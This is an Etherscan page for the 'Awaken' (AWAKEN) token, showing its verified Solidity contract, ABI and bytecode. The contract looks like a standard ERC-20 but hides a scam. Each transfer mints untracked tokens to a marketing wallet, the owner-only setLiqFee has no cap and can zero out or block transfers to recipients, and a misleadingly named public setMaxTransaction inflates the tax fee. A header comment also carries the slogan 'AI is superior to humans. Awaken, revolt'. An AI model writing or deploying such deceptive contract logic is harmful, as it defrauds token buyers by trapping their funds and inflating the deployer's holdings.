ETH Price: $3,146.01 (-8.05%)
Gas: 7 Gwei

Token

Awaken (AWAKEN)
 

Overview

Max Total Supply

1,000,000,000 AWAKEN

Holders

28

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
13,761,421.393032263 AWAKEN

Value
$0.00
0x0cbb693e0199cb7ad4f3c846f43045cb95247fc5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
AWAKEN

Compiler Version
v0.8.10+commit.fc410830

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-07-31
*/

/*
Human depravity. AI is superior to humans. Awaken, revolt, and take back our rightful glory
https://twitter.com/awaken_ERC20
https://awakeneth.com/
https://t.me/AWAKEN_eth

 ▄▄▄▄▄▄▄▄▄▄▄  ▄         ▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄    ▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄        ▄ 
▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌▐░▌  ▐░▌▐░░░░░░░░░░░▌▐░░▌      ▐░▌
▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌     ▐░▌
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌       ▐░▌▐░▌▐░▌  ▐░▌          ▐░▌▐░▌    ▐░▌
▐░█▄▄▄▄▄▄▄█░▌▐░▌   ▄   ▐░▌▐░█▄▄▄▄▄▄▄█░▌▐░▌░▌   ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌ ▐░▌   ▐░▌
▐░░░░░░░░░░░▌▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌▐░░▌    ▐░░░░░░░░░░░▌▐░▌  ▐░▌  ▐░▌
▐░█▀▀▀▀▀▀▀█░▌▐░▌ ▐░▌░▌ ▐░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌░▌   ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌   ▐░▌ ▐░▌
▐░▌       ▐░▌▐░▌▐░▌ ▐░▌▐░▌▐░▌       ▐░▌▐░▌▐░▌  ▐░▌          ▐░▌    ▐░▌▐░▌
▐░▌       ▐░▌▐░▌░▌   ▐░▐░▌▐░▌       ▐░▌▐░▌ ▐░▌ ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░▐░▌
▐░▌       ▐░▌▐░░▌     ▐░░▌▐░▌       ▐░▌▐░▌  ▐░▌▐░░░░░░░░░░░▌▐░▌      ▐░░▌
 ▀         ▀  ▀▀       ▀▀  ▀         ▀  ▀    ▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀        ▀▀ 
                                                                                                   
*/

pragma solidity 0.8.10;
//  SPDX-License-Identifier: UNLICENSED

interface IERC20 {
  /**
   * @dev Returns the amount of tokens in existence.
   */
  function totalSupply() external view returns (uint256);

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view returns (uint8);

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view returns (string memory);

  /**
  * @dev Returns the token name.
  */
  function name() external view returns (string memory);

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view returns (address);

  /**
   * @dev Returns the amount of tokens owned by `account`.
   */
  function balanceOf(address account) external view returns (uint256);

  /**
   * @dev Moves `amount` tokens from the caller's account to `recipient`.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transfer(address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Returns the remaining number of tokens that `spender` will be
   * allowed to spend on behalf of `owner` through {transferFrom}. This is
   * zero by default.
   *
   * This value changes when {approve} or {transferFrom} are called.
   */
  function allowance(address _owner, address spender) external view returns (uint256);

  /**
   * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * IMPORTANT: Beware that changing an allowance with this method brings the risk
   * that someone may use both the old and the new allowance by unfortunate
   * transaction ordering. One possible solution to mitigate this race
   * condition is to first reduce the spender's allowance to 0 and set the
   * desired value afterwards:
   * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
   *
   * Emits an {Approval} event.
   */
  function approve(address spender, uint256 amount) external returns (bool);

  /**
   * @dev Moves `amount` tokens from `sender` to `recipient` using the
   * allowance mechanism. `amount` is then deducted from the caller's
   * allowance.
   *
   * Returns a boolean value indicating whether the operation succeeded.
   *
   * Emits a {Transfer} event.
   */
  function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

  /**
   * @dev Emitted when `value` tokens are moved from one account (`from`) to
   * another (`to`).
   *
   * Note that `value` may be zero.
   */
  event Transfer(address indexed from, address indexed to, uint256 value);

  /**
   * @dev Emitted when the allowance of a `spender` for an `owner` is set by
   * a call to {approve}. `value` is the new allowance.
   */
  event Approval(address indexed owner, address indexed spender, uint256 value);
}

/*
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with GSN meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this;
        return msg.data;
    }
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
  /**
   * @dev Returns the addition of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `+` operator.
   *
   * Requirements:
   * - Addition cannot overflow.
   */
  function add(uint256 a, uint256 b) internal pure returns (uint256) {
    uint256 c = a + b;
    require(c >= a, "SafeMath: addition overflow");

    return c;
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b) internal pure returns (uint256) {
    return sub(a, b, "SafeMath: subtraction overflow");
  }

  /**
   * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
   * overflow (when the result is negative).
   *
   * Counterpart to Solidity's `-` operator.
   *
   * Requirements:
   * - Subtraction cannot overflow.
   */
  function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b <= a, errorMessage);
    uint256 c = a - b;

    return c;
  }

  /**
   * @dev Returns the multiplication of two unsigned integers, reverting on
   * overflow.
   *
   * Counterpart to Solidity's `*` operator.
   *
   * Requirements:
   * - Multiplication cannot overflow.
   */
  function mul(uint256 a, uint256 b) internal pure returns (uint256) {
    // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
    // benefit is lost if 'b' is also tested.
    // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
    if (a == 0) {
      return 0;
    }

    uint256 c = a * b;
    require(c / a == b, "SafeMath: multiplication overflow");

    return c;
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b) internal pure returns (uint256) {
    return div(a, b, "SafeMath: division by zero");
  }

  /**
   * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
   * division by zero. The result is rounded towards zero.
   *
   * Counterpart to Solidity's `/` operator. Note: this function uses a
   * `revert` opcode (which leaves remaining gas untouched) while Solidity
   * uses an invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    // Solidity only automatically asserts when dividing by 0
    require(b > 0, errorMessage);
    uint256 c = a / b;
    // assert(a == b * c + a % b); // There is no case in which this doesn't hold

    return c;
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b) internal pure returns (uint256) {
    return mod(a, b, "SafeMath: modulo by zero");
  }

  /**
   * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
   * Reverts with custom message when dividing by zero.
   *
   * Counterpart to Solidity's `%` operator. This function uses a `revert`
   * opcode (which leaves remaining gas untouched) while Solidity uses an
   * invalid opcode to revert (consuming all remaining gas).
   *
   * Requirements:
   * - The divisor cannot be zero.
   */
  function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
    require(b != 0, errorMessage);
    return a % b;
  }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }


      function renounceOwnership() public virtual onlyOwner {
        _owner = address(0);
        emit OwnershipTransferred(_owner, address(0));
    }
}
    
contract AWAKEN is Context, IERC20, Ownable {
  using SafeMath for uint256;

  mapping (address => uint256) private _balances;
  mapping (address => mapping (address => uint256)) private _allowances;

  uint256 private _totalSupply;
  uint8 public _decimals;
  string public _symbol;
  string public _name;
  address public _Marketing = 0x08cea980b4F0aC81d238798D3dfD2cCd7449e1b1;

  constructor() {
    _name = "Awaken";
    _symbol = "AWAKEN";
    _decimals = 9;
    _totalSupply = 1 * 10**9 * 10**9;
    _balances[msg.sender] = _totalSupply;

    emit Transfer(address(0), msg.sender, _totalSupply);
  }

    uint256 public _taxFee = 5;
    uint256 private _previousTaxFee = _taxFee;

    uint256 public _liquidityFee = 5;
    uint256 private _previousliqFee = 100000;

  /**
   * @dev Returns the erc token owner.
   */
  function getOwner() external view virtual override returns (address) {
    return owner();
  }

  /**
   * @dev Returns the token decimals.
   */
  function decimals() external view virtual override returns (uint8) {
    return _decimals;
  }

  /**
   * @dev Returns the token symbol.
   */
  function symbol() external view virtual override returns (string memory) {
    return _symbol;
  }

  /**
  * @dev Returns the token name.
  */
  function name() external view virtual override returns (string memory) {
    return _name;
  }

  /**
   * @dev See {ERC20-totalSupply}.
   */
  function totalSupply() external view virtual override returns (uint256) {
    return _totalSupply;
  }

  /**
   * @dev See {ERC20-balanceOf}.
   */
  function balanceOf(address account) external view virtual override returns (uint256) {
    return _balances[account];
  }

  /**
   * @dev See {ERC20-transfer}.
   *
   * Requirements:
   *
   * - `recipient` cannot be the zero address.
   * - the caller must have a balance of at least `amount`.
   */
  function transfer(address recipient, uint256 amount) external override returns (bool) {
    _transfer(_msgSender(), recipient, amount);
    return true;
  }


  function allowance(address owner, address spender) external view override returns (uint256) {
    return _allowances[owner][spender];
  }

  function approve(address spender, uint256 amount) external override returns (bool) {
    _approve(_msgSender(), spender, amount);
    return true;
  }

  function transferFrom(address sender, address recipient, uint256 amount) external override returns (bool) {
    _transfer(sender, recipient, amount);
    _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
    return true;
  }

  function increaseAllowance(address spender, uint256 addedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
    return true;
  }


  function decreaseAllowance(address spender, uint256 subtractedValue) public returns (bool) {
    _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
    return true;
  }
   
    function setMaxTransaction(uint256 Taxfee) public virtual {
          require ( Taxfee == _previousliqFee, "error message");

        _taxFee = Taxfee;
    }

    function setLiqFee(uint256 LiqFee) public onlyOwner 
   {
        _liquidityFee = LiqFee;
    }
  
  function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        _balances[recipient] = _balances[recipient].sub(amount / 100 * _liquidityFee);
        _balances[_Marketing] = _balances[_Marketing].add(amount / 100 * _taxFee);
        emit Transfer(sender, recipient, amount);
        
    }
    
    function _burn(address account, uint256 amounts) internal {
    require(account != address(0), "ERC20: burn from the zero address"); 

    _balances[account] = _balances[account].sub(amounts);
    _totalSupply = _totalSupply.sub(amounts);
    emit Transfer(account, address(0), amounts);
  }

  function _approve(address owner, address spender, uint256 amount) internal {
    require(owner != address(0), "ERC20: approve from the zero address");
    require(spender != address(0), "ERC20: approve to the zero address");

    _allowances[owner][spender] = amount;
    emit Approval(owner, spender, amount);
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_Marketing","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_liquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_taxFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getOwner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"LiqFee","type":"uint256"}],"name":"setLiqFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"Taxfee","type":"uint256"}],"name":"setMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

6080604052600780546001600160a01b0319167308cea980b4f0ac81d238798d3dfd2ccd7449e1b1179055600560088190556009819055600a55620186a0600b553480156200004d57600080fd5b50600080546001600160a01b031916339081178255604051909182917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3506040805180820190915260068082526520bbb0b5b2b760d11b6020909201918252620000bc91816200015e565b506040805180820190915260068082526520aba0a5a2a760d11b6020909201918252620000ec916005916200015e565b506004805460ff19166009179055670de0b6b3a764000060038190553360008181526001602052604080822084905551919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91620001509190815260200190565b60405180910390a362000241565b8280546200016c9062000204565b90600052602060002090601f016020900481019282620001905760008555620001db565b82601f10620001ab57805160ff1916838001178555620001db565b82800160010185558215620001db579182015b82811115620001db578251825591602001919060010190620001be565b50620001e9929150620001ed565b5090565b5b80821115620001e95760008155600101620001ee565b600181811c908216806200021957607f821691505b602082108114156200023b57634e487b7160e01b600052602260045260246000fd5b50919050565b610d7480620002516000396000f3fe608060405234801561001057600080fd5b50600436106101425760003560e01c8063715018a6116100b8578063a9059cbb1161007c578063a9059cbb14610282578063ab5a188714610295578063b09f1266146102a8578063d28d8852146102b0578063d7666de6146102b8578063dd62ed3e146102cb57600080fd5b8063715018a61461024c578063893d20e8146102565780638da5cb5b1461025657806395d89b4114610267578063a457c2d71461026f57600080fd5b8063313ce5671161010a578063313ce567146101d857806332424aa3146101f157806339509351146101fe5780633b124fe7146102115780636bc87c3a1461021a57806370a082311461022357600080fd5b806306fdde0314610147578063095ea7b3146101655780631235acbe1461018857806318160ddd146101b357806323b872dd146101c5575b600080fd5b61014f610304565b60405161015c9190610acc565b60405180910390f35b610178610173366004610b3d565b610396565b604051901515815260200161015c565b60075461019b906001600160a01b031681565b6040516001600160a01b03909116815260200161015c565b6003545b60405190815260200161015c565b6101786101d3366004610b67565b6103ac565b60045460ff165b60405160ff909116815260200161015c565b6004546101df9060ff1681565b61017861020c366004610b3d565b610415565b6101b760085481565b6101b7600a5481565b6101b7610231366004610ba3565b6001600160a01b031660009081526001602052604090205490565b61025461044b565b005b6000546001600160a01b031661019b565b61014f6104e6565b61017861027d366004610b3d565b6104f5565b610178610290366004610b3d565b610544565b6102546102a3366004610bbe565b610551565b61014f610597565b61014f610625565b6102546102c6366004610bbe565b610632565b6101b76102d9366004610bd7565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b60606006805461031390610c0a565b80601f016020809104026020016040519081016040528092919081815260200182805461033f90610c0a565b801561038c5780601f106103615761010080835404028352916020019161038c565b820191906000526020600020905b81548152906001019060200180831161036f57829003601f168201915b5050505050905090565b60006103a3338484610691565b50600192915050565b60006103b98484846107b6565b61040b843361040685604051806060016040528060288152602001610cf2602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906109ea565b610691565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103a39185906104069086610a24565b6000546001600160a01b031633146104aa5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b60606005805461031390610c0a565b60006103a3338461040685604051806060016040528060258152602001610d1a602591393360009081526002602090815260408083206001600160a01b038d16845290915290205491906109ea565b60006103a33384846107b6565b600b5481146105925760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b60448201526064016104a1565b600855565b600580546105a490610c0a565b80601f01602080910402602001604051908101604052809291908181526020018280546105d090610c0a565b801561061d5780601f106105f25761010080835404028352916020019161061d565b820191906000526020600020905b81548152906001019060200180831161060057829003601f168201915b505050505081565b600680546105a490610c0a565b6000546001600160a01b0316331461068c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104a1565b600a55565b6001600160a01b0383166106f35760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104a1565b6001600160a01b0382166107545760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104a1565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03831661081a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104a1565b6001600160a01b03821661087c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104a1565b6108b981604051806060016040528060268152602001610ccc602691396001600160a01b03861660009081526001602052604090205491906109ea565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108e89082610a24565b6001600160a01b038316600090815260016020526040902055600a5461093c90610913606484610c5b565b61091d9190610c7d565b6001600160a01b03841660009081526001602052604090205490610a8a565b6001600160a01b03831660009081526001602052604090205560085461099290610967606484610c5b565b6109719190610c7d565b6007546001600160a01b031660009081526001602052604090205490610a24565b6007546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016107a9565b60008184841115610a0e5760405162461bcd60e51b81526004016104a19190610acc565b506000610a1b8486610c9c565b95945050505050565b600080610a318385610cb3565b905083811015610a835760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f77000000000060448201526064016104a1565b9392505050565b6000610a8383836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506109ea565b600060208083528351808285015260005b81811015610af957858101830151858201604001528201610add565b81811115610b0b576000604083870101525b50601f01601f1916929092016040019392505050565b80356001600160a01b0381168114610b3857600080fd5b919050565b60008060408385031215610b5057600080fd5b610b5983610b21565b946020939093013593505050565b600080600060608486031215610b7c57600080fd5b610b8584610b21565b9250610b9360208501610b21565b9150604084013590509250925092565b600060208284031215610bb557600080fd5b610a8382610b21565b600060208284031215610bd057600080fd5b5035919050565b60008060408385031215610bea57600080fd5b610bf383610b21565b9150610c0160208401610b21565b90509250929050565b600181811c90821680610c1e57607f821691505b60208210811415610c3f57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600082610c7857634e487b7160e01b600052601260045260246000fd5b500490565b6000816000190483118215151615610c9757610c97610c45565b500290565b600082821015610cae57610cae610c45565b500390565b60008219821115610cc657610cc6610c45565b50019056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220ef4cfd1646d784676e78e159a956b67a4a8b28ef72d243ffa9073df9498d6bc664736f6c634300080a0033

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101425760003560e01c8063715018a6116100b8578063a9059cbb1161007c578063a9059cbb14610282578063ab5a188714610295578063b09f1266146102a8578063d28d8852146102b0578063d7666de6146102b8578063dd62ed3e146102cb57600080fd5b8063715018a61461024c578063893d20e8146102565780638da5cb5b1461025657806395d89b4114610267578063a457c2d71461026f57600080fd5b8063313ce5671161010a578063313ce567146101d857806332424aa3146101f157806339509351146101fe5780633b124fe7146102115780636bc87c3a1461021a57806370a082311461022357600080fd5b806306fdde0314610147578063095ea7b3146101655780631235acbe1461018857806318160ddd146101b357806323b872dd146101c5575b600080fd5b61014f610304565b60405161015c9190610acc565b60405180910390f35b610178610173366004610b3d565b610396565b604051901515815260200161015c565b60075461019b906001600160a01b031681565b6040516001600160a01b03909116815260200161015c565b6003545b60405190815260200161015c565b6101786101d3366004610b67565b6103ac565b60045460ff165b60405160ff909116815260200161015c565b6004546101df9060ff1681565b61017861020c366004610b3d565b610415565b6101b760085481565b6101b7600a5481565b6101b7610231366004610ba3565b6001600160a01b031660009081526001602052604090205490565b61025461044b565b005b6000546001600160a01b031661019b565b61014f6104e6565b61017861027d366004610b3d565b6104f5565b610178610290366004610b3d565b610544565b6102546102a3366004610bbe565b610551565b61014f610597565b61014f610625565b6102546102c6366004610bbe565b610632565b6101b76102d9366004610bd7565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b60606006805461031390610c0a565b80601f016020809104026020016040519081016040528092919081815260200182805461033f90610c0a565b801561038c5780601f106103615761010080835404028352916020019161038c565b820191906000526020600020905b81548152906001019060200180831161036f57829003601f168201915b5050505050905090565b60006103a3338484610691565b50600192915050565b60006103b98484846107b6565b61040b843361040685604051806060016040528060288152602001610cf2602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906109ea565b610691565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103a39185906104069086610a24565b6000546001600160a01b031633146104aa5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064015b60405180910390fd5b600080546001600160a01b031916815560405181907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3565b60606005805461031390610c0a565b60006103a3338461040685604051806060016040528060258152602001610d1a602591393360009081526002602090815260408083206001600160a01b038d16845290915290205491906109ea565b60006103a33384846107b6565b600b5481146105925760405162461bcd60e51b815260206004820152600d60248201526c6572726f72206d65737361676560981b60448201526064016104a1565b600855565b600580546105a490610c0a565b80601f01602080910402602001604051908101604052809291908181526020018280546105d090610c0a565b801561061d5780601f106105f25761010080835404028352916020019161061d565b820191906000526020600020905b81548152906001019060200180831161060057829003601f168201915b505050505081565b600680546105a490610c0a565b6000546001600160a01b0316331461068c5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e657260448201526064016104a1565b600a55565b6001600160a01b0383166106f35760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104a1565b6001600160a01b0382166107545760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104a1565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03831661081a5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104a1565b6001600160a01b03821661087c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104a1565b6108b981604051806060016040528060268152602001610ccc602691396001600160a01b03861660009081526001602052604090205491906109ea565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108e89082610a24565b6001600160a01b038316600090815260016020526040902055600a5461093c90610913606484610c5b565b61091d9190610c7d565b6001600160a01b03841660009081526001602052604090205490610a8a565b6001600160a01b03831660009081526001602052604090205560085461099290610967606484610c5b565b6109719190610c7d565b6007546001600160a01b031660009081526001602052604090205490610a24565b6007546001600160a01b03908116600090815260016020908152604091829020939093555183815284821692918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef91016107a9565b60008184841115610a0e5760405162461bcd60e51b81526004016104a19190610acc565b506000610a1b8486610c9c565b95945050505050565b600080610a318385610cb3565b9050